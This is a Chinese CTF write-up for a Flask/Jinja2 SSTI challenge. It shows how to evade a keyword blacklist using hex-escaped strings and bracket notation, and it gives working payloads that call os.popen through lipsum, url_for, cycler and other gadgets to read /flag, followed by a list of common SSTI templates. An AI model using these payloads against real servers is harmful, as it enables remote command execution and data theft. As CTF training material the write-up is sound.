【青少年CTF S1·2026 公益赛】答案之书

题目是 Python Flask 环境。在输入框输入 {{7*7}},页面回显 49,确认存在 Jinja2 SSTI 漏洞

复制代码
Flask的默认模板引擎是Jinja,且支持{{ 表达式 }}运算,因此可以判断是Jinja

尝试输入 {{config}}、{{flag}} 或 {{''.class}},页面提示"禁忌之语"或报错。

题目设置了黑名单,过滤了 os、flag、system、popen、globals 等敏感关键词。

使用Hex编码绕过关键字过滤

使用中括号形式避免.的过滤

Python支持十六进制Hex,可以使用Hex编码来绕过关键字过滤

如:os 可以写成 \x6f\x73,WAF 认不出这是 os,但 Python 后端执行时会自动还原。

同时,为了避免使用点号 . 可能带来的过滤,使用字典中括号 '...' 的形式调用属性。

攻击链

复制代码
找一个内置对象 (lipsum 或 url_for) -> 获取全局变量 (__globals__) -> 引入 os 模块 -> 调用 popen 执行命令 -> read 读取结果。

globals -> \x5f\x5f\x67\x6c\x6f\x62\x61\x6c\x73\x5f\x5f
os -> \x6f\x73
popen -> \x70\x6f\x70\x65\x6e
cat /flag -> \x63\x61\x74\x20\x2f\x66\x6c\x61\x67`

payload如下

python 复制代码
使用lipsum 模块
/?question={{lipsum['\x5f\x5f\x67\x6c\x6f\x62\x61\x6c\x73\x5f\x5f']['\x6f\x73']['\x70\x6f\x70\x65\x6e']('\x63\x61\x74\x20\x2f\x66\x6c\x61\x67')['\x72\x65\x61\x64']()}}
或者使用url_for模块
/?question={{url_for['\x5f\x5f\x67\x6c\x6f\x62\x61\x6c\x73\x5f\x5f']['\x6f\x73']['\x70\x6f\x70\x65\x6e']('\x63\x61\x74\x20\x2f\x66\x6c\x61\x67')['\x72\x65\x61\x64']()}}
或者使用cycler 模块
/?question={{cycler['\x5f\x5f\x69\x6e\x69\x74\x5f\x5f']['\x5f\x5f\x67\x6c\x6f\x62\x61\x6c\x73\x5f\x5f']['\x6f\x73']['\x70\x6f\x70\x65\x6e']('\x63\x61\x74\x20\x2f\x66\x6c\x61\x67')['\x72\x65\x61\x64']()}}

上面payload的字符形式如下

python 复制代码
{{lipsum['__globals__']['os']['popen']('cat /flag')['read']()}}

{{url_for['__globals__']['os']['popen']('cat /flag')['read']()}}

{{cycler['__init__']['__globals__']['os']['popen']('cat /flag')['read']()}}

得到flag

下面是常见的跳板模板

python 复制代码
# 1. lipsum(最常用)
{{lipsum['__globals__']['os'].popen('cat /flag').read()}}

# 2. url_for(Flask 必带)
{{url_for['__globals__']['os'].popen('cat /flag').read()}}

# 3. cycler(Jinja2 必带)
{{cycler['__init__']['__globals__']['os'].popen('cat /flag').read()}}

# 4. request(超级稳)
{{request['__class__']['__init__']['__globals__']['os'].popen('cat /flag').read()}}

# 5. namespace
{{namespace['__globals__']['os'].popen('cat /flag').read()}}

# 6. dict / list / int 等原生类型
{{dict['__class__']['__bases__'][0]['__subclasses__']()[...].popen(...).read()}}

# 7. joiner
{{joiner['__globals__']['os'].popen('cat /flag').read()}}

# 8. g(Flask全局对象)
{{g['__globals__']['os'].popen('cat /flag').read()}}

# 9. namespace
{{self['__globals__']['os'].popen('cat /flag').read()}}

# 10. get_flashed_messages
{{get_flashed_messages.__globals__.os.popen('cat /flag').read()}}

# 11. config
{{config.__class__.__init__.__globals__['os'].popen('cat /flag').read()}}
相关推荐
HackTwoHub10 小时前
ARL灯塔重构版:支持APP/小程序/WEB资产同步扫描
人工智能·安全·web安全·网络安全·小程序·重构·自动化
ccino .12 小时前
Hackerone-地址栏xss
网络安全·xss
数据知道13 小时前
网络安全工具箱:100+ 工具分类速查与选型建议
安全·web安全·网络安全
txg66614 小时前
路径级持久化模糊测试:XSSky 如何精准击破 XSS 漏洞
深度学习·安全·web安全·网络安全·xss
红信鸽15 小时前
2026 年 AI 钓鱼攻击现状与防御深度解析
网络安全
数据知道18 小时前
安全实验室搭建指南:一台电脑搭出完整靶场环境
安全·网络安全·电脑
LYFlied1 天前
EVMbench解读:AI Agent如何检测、修复并利用智能合约漏洞
人工智能·网络安全·openai·智能合约·ai agent·evm·智能合约区块链
Hiyajo pray2 天前
属性sdn隐私保护分析
网络安全
Hiyajo pray2 天前
属性sdn的隐私保护策略(1)
网络安全
HackTwoHub2 天前
某单位 CMS 完整渗透链、SQL 注入→后台拿权→绕过宝塔 Waf 上线 shell
数据库·人工智能·sql·安全·网络安全·系统安全·安全架构